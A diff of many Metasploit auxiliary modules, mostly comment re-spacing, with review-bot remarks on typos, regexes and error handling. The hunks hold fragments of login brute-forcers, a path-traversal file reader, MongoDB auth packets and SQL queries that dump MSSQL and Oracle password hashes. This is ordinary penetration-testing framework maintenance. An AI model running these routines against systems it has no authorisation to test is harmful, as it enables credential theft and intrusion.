vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")


@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
])
], self.class)
# "Set to false to prevent account lockouts - it will!"
# Set to false to prevent account lockouts - it will!
deregister_options('BLANK_PASSWORDS')
end
def target_url
#Function to display correct protocol and host/vhost info
# Function to display correct protocol and host/vhost info
if rport == 443 or ssl
proto = "https"
else
@ -74,8 +74,8 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Check for HTTP 200 response.
#Numerous versions and configs make if difficult to further fingerprint.
# Check for HTTP 200 response.
# Numerous versions and configs make if difficult to further fingerprint.
if (res and res.code == 200)
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
@ -110,8 +110,8 @@ class Metasploit3 < Msf::Auxiliary
end
def get_version
#Attempt to retrieve the version of CMS400.NET installed.
#Not always possible based on version/config.
# Attempt to retrieve the version of CMS400.NET installed.
# Not always possible based on version/config.
payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
res = send_request_cgi(
{
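Review bot: The re-spaced comment `# Numerous versions and configs make if difficult to further fingerprint.` carries the typo over from the old line; it should read `# Numerous versions and configs make it difficult to further fingerprint.`. In `get_version`, `payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"` hard-codes the `http` scheme while `target_url` above chooses `https` when `rport == 443 or ssl`; if `payload` is used as the request URI this disagrees with an SSL target, but its use is outside the hunk. The `or` in `if rport == 443 or ssl` is also worth changing to `||` for consistency with the style guide.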


@ -158,7 +158,6 @@ class Metasploit3 < Msf::Auxiliary
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400


@ -128,17 +128,17 @@ class Metasploit4 < Msf::Auxiliary
case action.name
when 'PUT'
#Append filename if there isn't one
# Append filename if there isn't one
if path !~ /(.+\.\w+)$/
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
vprint_status("No filename specified. Using: #{path}")
end
#Upload file
# Upload file
res = do_put(path, data)
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
#Check file
# Check file
if not res.nil? and file_exists(path, data)
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
print_good("File uploaded: #{turl}")
@ -156,7 +156,7 @@ class Metasploit4 < Msf::Auxiliary
end
when 'DELETE'
#Check file before deleting
# Check file before deleting
if path !~ /(.+\.\w+)$/
print_error("You must supply a filename")
return
@ -165,11 +165,11 @@ class Metasploit4 < Msf::Auxiliary
return
end
#Delete our file
# Delete our file
res = do_delete(path)
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
#Check if DELETE was successful
# Check if DELETE was successful
if res.nil? or file_exists(path, data)
print_error("DELETE failed. File is still there.")
else
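Review bot: `path << "#{Rex::Text.rand_text_alpha(5)}.txt"` under the re-spaced `# Append filename if there isn't one` appends in place, so if `path` is the datastore option value (its assignment is above the hunk) the option string is rewritten and the random name sticks for later runs; `path = "#{path}#{Rex::Text.rand_text_alpha(5)}.txt"` avoids mutating a shared string. `vprint_status("Reply: #{res.code.to_s}") if not res.nil?`, which appears in both the PUT and DELETE branches, can drop the `.to_s` inside the interpolation and end with `if res`. The `case action.name` statement starts and ends outside the hunk.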


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
}
})
#without res.body.length we get lots of false positives
# without res.body.length we get lots of false positives
if (res and res.code == 200 and res.body.length > 0)
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
report_web_vuln({
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
# test login
begin
res = send_request_cgi({
'uri' => '/',


@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Discovery and exploit
'Brendan Coles <bcoles[at]gmail.com>' # msf
'Brendan Coles <bcoles[at]gmail.com>' # metasploit module
],
'References' =>
[


@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'blkhtc0rp', #Original
'sinn3r'
'blkhtc0rp', #Original
'sinn3r' #Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Oct 19 2012"


@ -34,9 +34,9 @@ class Metasploit4 < Msf::Auxiliary
],
'Author' =>
[
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
],
'License' => MSF_LICENSE
)


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
tpath += '/'
end
#load the file with filenames into memory
# load the file with filenames into memory
queue = []
File.open(datastore['FILEPATH'], 'rb').each_line do |fn|
queue << fn.strip
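Review bot: `File.open(datastore['FILEPATH'], 'rb').each_line do |fn|` under the re-spaced `# load the file with filenames into memory` comment opens the wordlist without a block, so the descriptor stays open until garbage collection. `File.foreach(datastore['FILEPATH']) { |fn| queue << fn.strip }` reads the same lines and closes the file when done, or the existing loop can be wrapped in `File.open(datastore['FILEPATH'], 'rb') do |f| f.each_line ... end`. The loop body continues past the end of the hunk, so the one-liner only applies if nothing else happens inside it.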


@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
return save_array
end
#traversal every file
# traverse every file
def find_files(file,user,pass)
traversal = '/../../'
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
#test login
# test login
begin
res = send_request_cgi({
'uri' => '/',


@ -186,8 +186,8 @@ class Metasploit3 < Msf::Auxiliary
return :abort
end
if action.name == "OWA_2013"
#Check for a response code to make sure login was valid. Changes from 2010 to 2013.
#Check if the password needs to be changed.
# Check for a response code to make sure login was valid. Changes from 2010 to 2013.
# Check if the password needs to be changed.
if res.headers['location'] =~ /expiredpassword/
print_good("#{msg} SUCCESSFUL LOGIN. '#{user}' : '#{pass}': NOTE password change required")
report_hash = {
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary
return :next_user
end
#No password change required moving on.
# No password change required moving on.
unless location = res.headers['location']
print_error("#{msg} No HTTP redirect. This is not OWA 2013, aborting.")
return :abort
@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary
if reason == nil
headers['Cookie'] = 'PBack=0;' << res.get_cookies
else
#Login didn't work. no point on going on.
# Login didn't work. no point on going on.
vprint_error("#{msg} FAILED LOGIN. '#{user}' : '#{pass}' (HTTP redirect with reason #{reason})")
return :Skip_pass
end
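Review bot: `return :Skip_pass` under the re-spaced `# Login didn't work. no point on going on.` comment uses a capitalised symbol while the other exits in this method return lowercase `:next_user` and `:abort`; if the credential loop that consumes these return values compares against specific lowercase symbols (it lives outside the hunk), `:Skip_pass` would be treated as no special action and the loop would keep trying passwords it meant to skip. Confirm the expected symbol against the brute-force mixin and lowercase it accordingly. `unless location = res.headers['location']` and `if reason == nil` could also become `location = res.headers['location']` / `unless location` and `if reason.nil?` per the style guide.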


@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary
an arbitrary object instantiation flaw in the XML request processor.
},
'Author' => [
'hdm', #author
'jjarmoc' #improvements
'hdm', # author
'jjarmoc' # improvements
],
'License' => MSF_LICENSE,
'References' =>


@ -146,7 +146,6 @@ class Metasploit3 < Msf::Auxiliary
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if dm == false
print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}")
#blah
end
else
if res.code.to_i == 400 and ecode != 400


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
case res.body
when nil
# Nothing
# Nothing
when /<Version xmlns=".*">(.*)<\/Version><\/getVersionResponse>/
version = "#{$1}"
success = true
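Review bot: `version = "#{$1}"` in the arm after the re-indented `# Nothing` interpolates a capture that is already a String; `version = Regexp.last_match(1)` says the same thing without the allocation and without the cryptic global. The `when nil` arm's `# Nothing` could also say what the empty body means for the caller, e.g. `# no body: version and success stay unchanged`. The `case` continues past the hunk.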


@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'HTTP Page Scraper',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'Author' => ['et'],
'License' => MSF_LICENSE
)


@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary
return false
else
print_status("Server #{wmap_target_host}:#{datastore['RPORT']} responded to SOAPAction: #{v}#{n} with HTTP: #{res.code} #{res.message}.")
## Add Report
# Add Report
report_note(
host: ip,
proto: 'tcp',


@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false
#request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
# request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
res_test = send_request_cgi({
'uri' => "http://#{datastore['CANARY_IP']}:80",
'method' => 'GET',


@ -87,17 +87,17 @@ class Metasploit3 < Msf::Auxiliary
if datastore['VERBOSE'] == true
vprint_good("#{rhost}:#{rport} - Response - File #{file}:")
res.body.each_line do |line|
#the following is the last line of the useless response
# the following is the last line of the useless response
if line.to_s =~ /\/\/--><\/SCRIPT>/
#setting out = true to print all of the following stuff
# setting out = true to print all of the following stuff
out = true
next
end
if out == true
if line =~ /<META/ or line =~ /<Script/
#we are finished :)
#the next line is typical code from the website and nothing from us
#this means we can skip this stuff ...
# we are finished :)
# the next line is typical code from the website and nothing from us
# this means we can skip this stuff ...
out = false
next
else
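Review bot: The `if line =~ /<META/ or line =~ /<Script/` check is case-sensitive, while the end-of-preamble marker matched a few lines above is upper-case `</SCRIPT>`, so a `<SCRIPT` or `<script` opening tag in the trailing page code would not stop the output and site markup would be printed as if it were file content; `if line =~ /<META/i || line =~ /<script/i` covers all casings and replaces `or`, whose low precedence is a known Ruby trap. The `if datastore['VERBOSE'] == true` wrapper around `vprint_good` is redundant if `vprint_*` already consults VERBOSE, which is the framework convention as far as I can tell; if the outer guard is meant to skip the whole loop, `if datastore['VERBOSE']` without the `== true` is enough. The loop and its enclosing method continue outside the hunk.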


@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
],
'Author' =>
[
'dun', #Discovery, PoC
'sinn3r' #Metasploit
'dun', # Discovery, PoC
'sinn3r' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Jul 13 2012"


@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', #Metasploit
'sinn3r', # Metasploit module
],
'References' =>
[


@ -162,8 +162,8 @@ class Metasploit3 < Msf::Auxiliary
#
# From the documentation:
#
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
# seconds in order to prevent brute force and dictionary attacks."
# "In case of five consecutive failed login attempts, Zabbix interface will pause for 30
# seconds in order to prevent brute force and dictionary attacks."
#
# Zabbix enables a Guest mode by default that allows access to the dashboard without auth


@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body)
#string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
# string we are regexing: <!-- Domino Release 7.0.3FP1 (Windows NT/Intel) -->
if match = res.body.match(/\<!-- Domino Release(.*) --\>/);
server1 = $1
report_note(
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body)
#string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
# string we are regexing: <title>IBM Lotus Notes/Domino 6.5.6 Release Notes</title>
if match = res.body.match(/\<title\>(.*)Lotus Notes\/Domino (.*) Release Notes\<\/title\>/);
server2 = $2
print_status("#{ip}:#{rport} Lotus Domino Release Notes Version: " + $2)
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body and res.body.index('TotalFileSize') and res.body.index('FileCount'))
#string we are regexing: # Regex Version=8.5.1.0
# string we are regexing: # Regex Version=8.5.1.0
if match = res.body.match(/Version=(.*)/);
server3 = $1
report_note(
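Review bot: Each `if match = res.body.match(...)` line assigns `match` and then reads `$1`/`$2` instead of the MatchData it just captured, and carries a stray trailing `;`; `server1 = match[1]` (and `match[2]` for the Release Notes title) takes the version from the object in hand rather than a global that any intervening regex can reset. The third pattern, `/Version=(.*)/`, is greedy to end of line and will swallow a trailing `\r` or whitespace into the reported version; `/Version=(\S+)/` keeps what gets stored in the note clean. Each `report_note(` call continues outside the hunk.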


@ -98,10 +98,10 @@ class Metasploit3 < Msf::Auxiliary
data = http.get(20)
if data =~ /DVR WebViewer/i
#Confirmed ActiveX control over HTTP, display the control name and version
#Report HTTP service info since there is a confirmed IE ActiveX control
#Code base example:
#codebase="CtrWeb.cab#version=1,1,5,4"
# Confirmed ActiveX control over HTTP, display the control name and version
# Report HTTP service info since there is a confirmed IE ActiveX control
# Code base example:
# codebase="CtrWeb.cab#version=1,1,5,4"
if data.match(/codebase="(\w{1,16})\.(\w{1,3}).version=(\d{1,3},\d{1,3},\d{1,3},\d{1,3})/)
v = "#{$1}.#{$2} v#{$3}"
else
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
:info => "IE ActiveX CCTV DVR Control (#{v})"
)
else
#An HTTP server is listening on HTTP_PORT, however, does not appear to be
#the ActiveX control
# An HTTP server is listening on HTTP_PORT, however, does not appear to be
# the ActiveX control
print_status("An unknown HTTP interface was found on #{datastore['HTTP_PORT']}/TCP")
end
@ -135,15 +135,15 @@ class Metasploit3 < Msf::Auxiliary
fill_length1 = 64 - user.length
#Check if user name length is too long for submission (exceeds packet length)
# Check if user name length is too long for submission (exceeds packet length)
if fill_length1 < 1
return
end
#Build the authentication packet starting here
# Build the authentication packet starting here
data = "\x00\x01\x00\x00\x80\x00\x00\x00" + user + ("\x00" * fill_length1)
#Check if password length is too long for submission (exceeds packet length)
# Check if password length is too long for submission (exceeds packet length)
fill_length2 = 64 - pass.length
if fill_length2 < 1
return
@ -164,14 +164,14 @@ class Metasploit3 < Msf::Auxiliary
return :abort
end
#Analyze the response
# Analyze the response
if res == "\x00\x01\x03\x01\x00\x00\x00\x00" #Failed Password
vprint_error("#{rhost}:#{rport} Failed login as: '#{user}'")
return
elsif res =="\x00\x01\x02\x01\x00\x00\x00\x00" #Invalid User
vprint_error("#{rhost}:#{rport} Invalid user: '#{user}'")
#Stop attempting passwords for this user since it doesn't exist
# Stop attempting passwords for this user since it doesn't exist
return :skip_user
elsif res =="\x00\x01\x05\x01\x00\x00\x00\x00" or res =="\x00\x01\x01\x01\x00\x00\x00\x00"
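Review bot: In `data.match(/codebase="(\w{1,16})\.(\w{1,3}).version=.../)` the `.` between the file extension and `version` is an unescaped wildcard, while the example comment directly above shows a literal `#` (`CtrWeb.cab#version=1,1,5,4`); `\.(\w{1,3})#version=` matches what is documented and nothing else. The `fill_length1 < 1` and `fill_length2 < 1` guards bail out with a bare `return` and no message, so a credential of 64 bytes or more is silently dropped from the run; a `vprint_error("#{rhost}:#{rport} user/pass longer than 63 bytes, skipping")` before the return makes that visible, and `return :skip_user` in the username case avoids retrying every password for a name that can never be sent. The login method continues outside the hunk.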


@ -210,9 +210,9 @@ class Metasploit3 < Msf::Auxiliary
print("Version of the InterBase server: #{info_svc_server_version}\n")
print("Implementation of the InterBase server: #{info_svc_implementation}\n\n")
# print(Rex::Text.to_hex_dump(response))
#print(Rex::Text.to_hex_dump(response))
#Add Report
# Add Report
report_note(
:host => ip,
:sname => 'ib',
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary
:data => "Version of the InterBase server: #{info_svc_server_version}"
)
#Add Report
# Add Report
report_note(
:host => ip,
:sname => 'ib',


@ -49,8 +49,8 @@ class Metasploit3 < Msf::Auxiliary
last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase
first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase
#check if it is a OKI
#OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
# check if it is a OKI
# OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
if first_six == "002536" || first_six == "008087" || first_six == "002536"
sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s
print_status("Found: #{sys_name}")
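Review bot: The OUI check `if first_six == "002536" || first_six == "008087" || first_six == "002536"` compares against `"002536"` twice, so either a third OKI prefix was lost in editing or the last clause is dead code; `%w[002536 008087].include?(first_six)` (plus the intended third prefix, if there was one) makes the list obvious and impossible to duplicate by accident. The OUI registry URL already in the comment is the place to confirm which prefixes are actually assigned to OKI. The enclosing method continues outside the hunk.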


@ -65,15 +65,15 @@ class Metasploit3 < Msf::Auxiliary
def require_auth?
request_id = Rex::Text.rand_text(4)
packet = "\x3f\x00\x00\x00" #messageLength (63)
packet << request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\x01\x00\x00\x00" #numberToReturn (1)
#query ({"listDatabases"=>1})
packet = "\x3f\x00\x00\x00" # messageLength (63)
packet << request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (admin.$cmd)
packet << "\x00\x00\x00\x00" # numberToSkip (0)
packet << "\x01\x00\x00\x00" # numberToReturn (1)
# query ({"listDatabases"=>1})
packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
sock.put(packet)
@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary
def auth(user, password, nonce)
request_id = Rex::Text.rand_text(4)
packet = request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\xff\xff\xff\xff" #numberToReturn (1)
packet = request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << datastore['DB'] + ".$cmd" + "\x00" # fullCollectionName (DB.$cmd)
packet << "\x00\x00\x00\x00" # numberToSkip (0)
packet << "\xff\xff\xff\xff" # numberToReturn (1)
#{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"}
document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65"
@ -109,12 +109,12 @@ class Metasploit3 < Msf::Auxiliary
document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00"
document << Rex::Text.md5(nonce + user + Rex::Text.md5(user + ":mongo:" + password)) + "\x00"
document << "\x00"
#Calculate document length
# Calculate document length
document.insert(0, [document.length + 4].pack("L"))
packet += document
#Calculate messageLength
# Calculate messageLength
packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength
sock.put(packet)
response = sock.recv(1024)
@ -137,15 +137,15 @@ class Metasploit3 < Msf::Auxiliary
def get_nonce
request_id = Rex::Text.rand_text(4)
packet = "\x3d\x00\x00\x00" #messageLength (61)
packet << request_id #requestID
packet << "\xff\xff\xff\xff" #responseTo
packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" #flags
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (test.$cmd)
packet = "\x3d\x00\x00\x00" # messageLength (61)
packet << request_id # requestID
packet << "\xff\xff\xff\xff" # responseTo
packet << "\xd4\x07\x00\x00" # opCode (2004 OP_QUERY)
packet << "\x00\x00\x00\x00" # flags
packet << "\x74\x65\x73\x74\x2e\x24\x63\x6d\x64\x00" # fullCollectionName (test.$cmd)
packet << "\x00\x00\x00\x00" #numberToSkip (0)
packet << "\x01\x00\x00\x00" #numberToReturn (1)
#query {"getnonce"=>1.0}
# query {"getnonce"=>1.0}
packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00"
sock.put(packet)
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
end
def have_auth_error?(response)
#Response header 36 bytes long
# Response header 36 bytes long
documents = response[36..1024]
#{"errmsg"=>"auth fails", "ok"=>0.0}
#{"errmsg"=>"need to login", "ok"=>0.0}
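Review bot: The two length prefixes in `auth` are produced with `pack("L")`, which is native-endian, while every other header field in these packets is hand-written little-endian as the MongoDB wire protocol requires; on a big-endian host both `messageLength` and the BSON document length would be byte-swapped and the request would most likely be rejected, so `document.insert(0, [document.length + 4].pack("V"))` and `packet.insert(0, [packet.length + 4].pack("V"))` should be used instead. The comment `# numberToReturn (1)` in `auth` sits on `"\xff\xff\xff\xff"`, which is -1, not 1, unlike the `"\x01\x00\x00\x00"` used for the same field in `require_auth?` and `get_nonce`; either the bytes or the comment is wrong, and at minimum the comment should read `# numberToReturn (-1)`. `have_auth_error?` continues outside the hunk.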


@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
create_credential_login(login_data)
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
print_status("Instance Name: #{instancename.inspect}")
version = mssql_query(mssql_sql_info())[:rows][0][0]
@ -89,8 +89,8 @@ class Metasploit3 < Msf::Auxiliary
end
#Stores the grabbed hashes as loot for later cracking
#The hash format is slightly different between 2k and 2k5/2k8
# Stores the grabbed hashes as loot for later cracking
# The hash format is slightly different between 2k and 2k5/2k8
def report_hashes(mssql_hashes, version_year)
case version_year
@ -154,8 +154,8 @@ class Metasploit3 < Msf::Auxiliary
end
end
#Grabs the user tables depending on what Version of MSSQL
#The queries are different between 2k and 2k/2k8
# Grabs the user tables depending on what Version of MSSQL
# The queries are different between 2k and 2k/2k8
def mssql_hashdump(version_year)
is_sysadmin = mssql_query(mssql_is_sysadmin())[:rows][0][0]
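Review bot: The re-spaced comment `# The queries are different between 2k and 2k/2k8` above `def mssql_hashdump` has a typo; the sibling comment on `report_hashes` says `2k5/2k8`, and this one should read the same. Separately, `mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]` chains four dereferences with no nil check, so an empty result set raises NoMethodError instead of a readable error; `rows = mssql_query(mssql_enumerate_servername())[:rows]` followed by `return unless rows && rows.first` would fail gracefully. The surrounding method starts outside the hunk.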


@ -40,13 +40,13 @@ class Metasploit3 < Msf::Auxiliary
return
end
#Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
# Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
instancename = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
print_status("Instance Name: #{instancename.inspect}")
version = mssql_query(mssql_sql_info())[:rows][0][0]
output = "Microsoft SQL Server Schema \n Host: #{datastore['RHOST']} \n Port: #{datastore['RPORT']} \n Instance: #{instancename} \n Version: #{version} \n====================\n\n"
#Grab all the DB schema and save it as notes
# Grab all the DB schema and save it as notes
mssql_schema = get_mssql_schema
return nil if mssql_schema.nil? or mssql_schema.empty?
mssql_schema.each do |db|
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Auxiliary
end
#Gets all of the Databases on this Instance
# Gets all of the Databases on this Instance
def get_db_names
results = mssql_query(mssql_db_names())[:rows]
return results
end
#Gets all the table names for the given DB
# Gets all the table names for the given DB
def get_tbl_names(db_name)
results = mssql_query("SELECT name,id FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
return results
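Review bot: `get_tbl_names` interpolates `db_name` straight into `SELECT name,id FROM #{db_name}..sysobjects`, so a database whose name contains a space, hyphen or other character that T-SQL requires to be delimited makes the query fail for that database and the schema dump silently loses it; `"SELECT name,id FROM [#{db_name.gsub(']', ']]')}]..sysobjects WHERE xtype = 'U'"` keeps every name returned by `get_db_names` usable. The name comes from the target server itself, so this is a robustness issue rather than an injection one. The method's `end` is outside the hunk.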


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [
'theLightCosine', # Original hashdump module
'jcran' # Authentication bypass bruteforce implementation
'jcran' # Authentication bypass bruteforce implementation
],
'References' => [
['CVE', '2012-2122'],


@ -18,11 +18,11 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'MySQL Login Utility',
'Name' => 'MySQL Login Utility',
'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',
'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password
]


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
return mysql_schema
end
#Gets all of the Tables names inside the given Database
# Gets all of the Tables names inside the given Database
def get_tbl_names(dbname)
tables=[]


@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
This module scans NFS mounts and their permissions.
},
'Author' => ['<tebo[at]attackresearch.com>'],
'References' =>
'References' =>
[
['CVE', '1999-0170'],
['URL', 'http://www.ietf.org/rfc/rfc1094.txt']
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
resp = sunrpc_call(procedure, "")
# XXX: Assume that transport is udp and port is 2049
# Technically we are talking to mountd not nfsd
# Technically we are talking to mountd not nfsd
report_service(
:host => ip,


@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
], self.class)
end
# Called for each response packet
# Called for each response packet
def scanner_process(data, shost, sport)
@results[shost] ||= { messages: [], peers: [] }
@results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data)
@ -148,14 +148,14 @@ class Metasploit3 < Msf::Auxiliary
idx = 0
peer_tuples = []
1.upto(pcnt) do
#u_int32 firsttime; /* first time we received a packet */
#u_int32 lasttime; /* last packet from this host */
#u_int32 restr; /* restrict bits (was named lastdrop) */
#u_int32 count; /* count of packets received */
#u_int32 addr; /* host address V4 style */
#u_int32 daddr; /* destination host address */
#u_int32 flags; /* flags about destination */
#u_short port; /* port number of last reception */
# u_int32 firsttime; /* first time we received a packet */
# u_int32 lasttime; /* last packet from this host */
# u_int32 restr; /* restrict bits (was named lastdrop) */
# u_int32 count; /* count of packets received */
# u_int32 addr; /* host address V4 style */
# u_int32 daddr; /* destination host address */
# u_int32 flags; /* flags about destination */
# u_short port; /* port number of last reception */
_,_,_,_,saddr,daddr,_,dport = data[idx, 30].unpack("NNNNNNNn")


@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
return if not check_dependencies
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
#Also, 11g uses SHA-1 while 8g-10g use DES
# Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
# Also, 11g uses SHA-1 while 8g-10g use DES
is_11g=false
query = 'select * from v$version'
ver = prepare_exec(query)
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
'Columns' => ['Username', 'Hash']
)
#Get the usernames and hashes for 8g-10g
# Get the usernames and hashes for 8g-10g
begin
if is_11g==false
query='SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
tbl << row
end
end
#Get the usernames and hashes for 11g
# Get the usernames and hashes for 11g
else
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
results= prepare_exec(query)
@ -97,8 +97,8 @@ class Metasploit3 < Msf::Auxiliary
def report_hashes(table, is_11g, ip, service)
#reports the hashes slightly differently depending on the version
#This is so that we know which are which when we go to crack them
# Reports the hashes slightly differently depending on the version
# This is so that we know which are which when we go to crack them
if is_11g==false
jtr_format = "des"
else
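Review bot: The re-spaced comments still say `8g-10g`; Oracle's pre-11g releases are 8i, 9i and 10g, so `# Checks for Version of Oracle, 8i-10g all behave one way, while 11g behaves differently` (and the same fix in the two query comments) would be accurate. The `is_11g==false` comparisons and `is_11g=false` assignment are a style point: `unless is_11g` and `is_11g = false` match the rest of the codebase and drop the explicit boolean comparison. `report_hashes` continues outside the hunk.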


@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
# Based vaugely on each_user_pass in AuthBrute
# Based vaguely on each_user_pass in AuthBrute
def each_sid(&block)
@@oracle_sid_fail = []
@@oracle_sid_success = []


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
packet = sock.read(100)
find_packet = packet.include? "(ERROR_STACK=(ERROR="
find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable")
#TODO: Module should report_vuln if this finding is solid.
# TODO: Module should report_vuln if this finding is solid.
